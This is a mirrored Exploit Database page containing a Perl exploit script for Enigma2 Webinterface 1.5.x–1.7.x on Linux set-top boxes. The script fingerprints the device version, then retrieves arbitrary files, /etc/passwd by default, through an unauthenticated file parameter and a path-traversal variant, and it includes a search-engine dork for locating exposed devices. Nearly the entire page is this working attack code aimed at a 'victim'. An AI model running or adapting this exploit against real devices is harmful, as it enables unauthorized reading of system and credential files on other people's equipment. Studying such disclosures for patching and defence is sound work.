Enigma2 Webinterface 1.5.x/1.6.x/1.7.x (Linux) – Remote File Disclosure

• Exploit Database
• 107 阅读

• 作者： Todor Donev
  日期： 2012-01-09
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/18343/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59

  #!/usr/bin/perl # #Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote root file disclosure exploit ## #Author: Todor Donev #Email me: todor.donev@@gmail.com #Platform: Linux #Type: remote ## #Gewgle Dork: "Enigma2 movielist" filetype:rss ## # #Enigma2 is a framebuffer-based zapping application (GUI) for linux. #It&apos;s targeted to real set-top-boxes, but would also work on regular PCs. #Enigma2 is based on the Python programming language with a backend #written in C++. It uses the [LinuxTV DVB API], which is part of a standard linux kernel. # #Enigma2 can also be controlled via an Enigma2:WebInterface. ## #Thanks to Tsvetelina Emirska !! ## use LWP::Simple; $t = $ARGV[0]; if(! $t) {usg();} $d = $ARGV[1]; if(! $d) {$d = "/etc/passwd";} my $r = get("http://$t/web/about") or exit; print "[+] Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote exploit\n"; print "[+] Target: $t\n"; if ($r =~ m/<e2webifversion>(.*)<\/e2webifversion>/g){ print "[+] Image Version: $1\n"; } if ($r =~ (m/1.6.0|1.6.1|1.6.2|1.6.3|1.6.4|1.6.5|1.6.6|1.6.7|1.6.8|1.6rc3|1.7.0/i)){ print "[+] Exploiting Enigma2 via type1 (file?file=$d)\n"; result(exploit1()); } if ($r =~ (m/1.5rc1|1.5beta4/i)){ print "[+] Exploiting Enigma2 via type2 (file/?file=../../../..$d)\n"; result(exploit2()); } sub usg{ print "\n[+] Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote exploit\n"; print "[+] Usage: perl enigma2.pl <victim> </path/file>\n"; exit; } sub exploit1{ my $x = get("http://$t/file?file=$d"); } sub exploit2{ my $x = get("http://$t/file/?file=../../../..$d"); } sub result{ my $x= shift; while(defined $x){ print "$x\n"; print "[+] I got it 4 cheap.. =)\n"; exit; }}